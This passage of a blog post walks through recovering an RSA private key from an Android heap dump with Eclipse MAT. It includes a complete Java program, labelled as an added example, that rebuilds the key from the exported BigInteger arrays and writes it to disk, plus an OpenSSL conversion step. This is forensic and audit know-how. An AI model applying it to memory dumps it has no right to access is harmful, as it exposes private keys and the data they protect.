white-space: pre-wrap;"> using </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">OpenSSL</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: lower-alpha; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Extract public key from the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PEM</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> file with </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">OpenSSL</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
</ol>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let us now look at the involved details. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The third component from Figure 1 corresponds to an instance of </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, which was the starting point for constructing the key. Selecting the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">com.android.org.bouncycastle.jcajce.provider.asymmetric.rsa.BCRSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> entry in MAT’s Dominator Tree populated the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Attributes</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> tab with the type, instance name and object reference of each of the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instances required to build this </span><a href="http://docs.oracle.com/javase/7/docs/api/java/security/spec/RSAPrivateCrtKeySpec.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. The following are the eight </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">components that make up an </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">modulus</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">publicExponent</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">privateExponent</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">primeP</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">primeQ</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">primeExponentP</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">primeExponentQ</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">crtCoefficient</span></div>
</li>
</ol>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I used this information to keep the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> component values apart in separate variables as they were copied out to the file system (see figure below). For example, the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">crtCoefficient at @0x410b0080</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in the Attributes tab (left) was mapped to an array of 32 integers (right). The modulus at </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">@0x410afde0</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> was 64 ints long, which indicated a 2048-bit key (64 × 32 bits); the 32-int crtCoefficient is half that size, as expected for a value reduced modulo one of the 1024-bit primes. Since MAT does not know how to export </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> objects, I used the actual </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">int[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> reference inside the corresponding </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> dropdown to copy out the binary content.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">That is, I right clicked the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">int[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> entry under each </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and exported its content. This was repeated for all eight </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> components, giving eight local files named after the corresponding </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Attribute</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> names. The following two images show the Attributes pane and the corresponding </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">int[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> content dump.</span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixIT0IyMdvJXi9riyP0QFVLD0t6GE8zJeTlId43QPy4Q180aXgnSaO3MG7WH1UX8yZ1F2PONCAkBNkKybT4JMzySlV6oiIfenMNR4d287kby8KSZ_I1-BIw9MRAZ-c457-dfhMNbUvxfuj/s1600/coefficients-marked.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixIT0IyMdvJXi9riyP0QFVLD0t6GE8zJeTlId43QPy4Q180aXgnSaO3MG7WH1UX8yZ1F2PONCAkBNkKybT4JMzySlV6oiIfenMNR4d287kby8KSZ_I1-BIw9MRAZ-c457-dfhMNbUvxfuj/s400/coefficients-marked.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows the Attributes and corresponding BigInteger objects in the heap</span></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj08gzmig5gfycCGFIEa7Bj5JkTYLXEAgNfOHbyvo2azM_VA6sb5CUO6lt9B0seDKnt1In14132HpJOfKfZyY9HmJbwsPKdnMPg2Wy3TnSNWFzEISGTQ6Boa3OPFuZ2QkAOJnTBcEMCLI3i/s1600/coefficient-save-value-as.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj08gzmig5gfycCGFIEa7Bj5JkTYLXEAgNfOHbyvo2azM_VA6sb5CUO6lt9B0seDKnt1In14132HpJOfKfZyY9HmJbwsPKdnMPg2Wy3TnSNWFzEISGTQ6Boa3OPFuZ2QkAOJnTBcEMCLI3i/s400/coefficient-save-value-as.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows int[64] selected to export the binary representation of the array</span></td></tr>
</tbody></table>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The next step after extracting the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> components was to check if I am able to use them to re-construct the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. So I decided to perform two basic tests before going forward.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Read individual </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">int</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> values from the file into which the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">int[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> was dumped and match them against the values shown in MAT</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Check that all </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> components are positive numbers</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I wrote some Java code to test all the binary dumps against these two conditions. The results indicated that the first condition held for all </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> components, but the second condition was not met by 3 out of the 8 </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> components, which came out as negative values as shown below. </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
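<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Java program below is an added example and is not the code from the original post. It covers both the two sanity checks just described and the reconstruction steps listed earlier (</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, then </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, then PKCS#8 on disk). It assumes that the eight MAT exports are raw 4-byte big-endian ints with no header, stored under the attribute names listed above, and that the words are ordered most significant first, as in the OpenJDK magnitude array; Android releases whose libcore </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> derives from Apache Harmony keep the digits least significant first, and the CRT consistency checks fail loudly rather than produce a wrong key if that flag is set incorrectly. The exported words are a magnitude whose sign lives in a separate field, so a dump whose top bit is set only looks negative when fed to </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">new BigInteger(byte[])</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">; passing an explicit signum of 1 keeps it positive. The class name, file names and the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">recovered.pk8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> output name are my own choices.</span></div>

```java
import java.io.ByteArrayInputStream;
import java.io.DataInputStream;
import java.io.IOException;
import java.math.BigInteger;
import java.nio.ByteBuffer;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.security.KeyFactory;
import java.security.interfaces.RSAPrivateCrtKey;
import java.security.spec.RSAPrivateCrtKeySpec;

/** Rebuilds an RSA private key from eight int[] dumps exported with MAT (added example, not the post's code). */
public class RebuildRsaKey {

    // Assumption: each dump is the raw int[] of one BigInteger, written as 4-byte big-endian ints
    // with no header. Assumption: words are most-significant first (OpenJDK-style magnitude array).
    // Harmony-derived Android libcore stores its digits least-significant first; set this to false
    // if checkCrtConsistency() rejects an otherwise clean dump.
    static final boolean MOST_SIGNIFICANT_WORD_FIRST = true;

    // File names match the MAT attribute names and the RSAPrivateCrtKeySpec constructor order.
    static final String[] NAMES = {"modulus", "publicExponent", "privateExponent", "primeP",
            "primeQ", "primeExponentP", "primeExponentQ", "crtCoefficient"};

    /** Condition 1: read the dump back as individual ints so they can be compared with MAT. */
    static int[] readIntArray(Path file) throws IOException {
        byte[] raw = Files.readAllBytes(file);
        if (raw.length == 0 || raw.length % 4 != 0) {
            throw new IOException(file + ": size " + raw.length + " is not a non-empty multiple of 4");
        }
        int[] words = new int[raw.length / 4];
        try (DataInputStream in = new DataInputStream(new ByteArrayInputStream(raw))) {
            for (int i = 0; i < words.length; i++) {
                words[i] = in.readInt();
            }
        }
        return words;
    }

    /** Concatenates the words most-significant first into big-endian magnitude bytes. */
    static byte[] magnitudeBytes(int[] words) {
        ByteBuffer buf = ByteBuffer.allocate(words.length * 4);
        for (int i = 0; i < words.length; i++) {
            buf.putInt(MOST_SIGNIFICANT_WORD_FIRST ? words[i] : words[words.length - 1 - i]);
        }
        return buf.array();
    }

    /** Condition 2: bytes with the top bit set parse as negative in two's complement; the dump is
     *  an unsigned magnitude, so build the BigInteger with signum = 1 instead. */
    static BigInteger toPositive(byte[] magnitude) {
        return new BigInteger(1, magnitude);
    }

    /** Verifies the RSA CRT relations so an inconsistent set of components is caught before use. */
    static void checkCrtConsistency(BigInteger n, BigInteger e, BigInteger d, BigInteger p,
                                    BigInteger q, BigInteger dP, BigInteger dQ, BigInteger qInv) {
        BigInteger pm1 = p.subtract(BigInteger.ONE);
        BigInteger qm1 = q.subtract(BigInteger.ONE);
        require(n.equals(p.multiply(q)), "modulus != primeP * primeQ");
        require(e.multiply(d).mod(pm1).equals(BigInteger.ONE), "e*d != 1 mod (p-1)");
        require(e.multiply(d).mod(qm1).equals(BigInteger.ONE), "e*d != 1 mod (q-1)");
        require(dP.equals(d.mod(pm1)), "primeExponentP != d mod (p-1)");
        require(dQ.equals(d.mod(qm1)), "primeExponentQ != d mod (q-1)");
        require(qInv.equals(q.modInverse(p)), "crtCoefficient != q^-1 mod p");
    }

    static void require(boolean ok, String what) {
        if (!ok) throw new IllegalStateException("inconsistent key material: " + what);
    }

    public static void main(String[] args) throws Exception {
        Path dir = Paths.get(args.length > 0 ? args[0] : ".");
        BigInteger[] v = new BigInteger[NAMES.length];
        for (int i = 0; i < NAMES.length; i++) {
            int[] words = readIntArray(dir.resolve(NAMES[i]));
            byte[] mag = magnitudeBytes(words);
            boolean looksNegative = new BigInteger(mag).signum() < 0;   // what a naive parse would give
            v[i] = toPositive(mag);
            System.out.printf("%-16s %3d words, %4d bits%s%n", NAMES[i], words.length,
                    v[i].bitLength(), looksNegative ? "  (top bit set: negative as two's complement)" : "");
        }
        checkCrtConsistency(v[0], v[1], v[2], v[3], v[4], v[5], v[6], v[7]);

        RSAPrivateCrtKeySpec spec = new RSAPrivateCrtKeySpec(v[0], v[1], v[2], v[3], v[4], v[5], v[6], v[7]);
        RSAPrivateCrtKey key = (RSAPrivateCrtKey) KeyFactory.getInstance("RSA").generatePrivate(spec);
        // getEncoded() on an RSA PrivateKey yields PKCS#8 DER; key.getFormat() reports "PKCS#8".
        Path out = dir.resolve("recovered.pk8");
        Files.write(out, key.getEncoded());
        System.out.println("wrote " + out + " (" + key.getFormat() + ", "
                + key.getModulus().bitLength() + "-bit modulus)");
    }
}
```

<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compile with </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">javac RebuildRsaKey.java</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and run </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">java RebuildRsaKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> with the directory holding the eight dumps as its argument. The optional steps from the list above are then </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">openssl pkcs8 -inform DER -nocrypt -in recovered.pk8 -out recovered.pem</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> followed by </span><span style="background-color: transparent; 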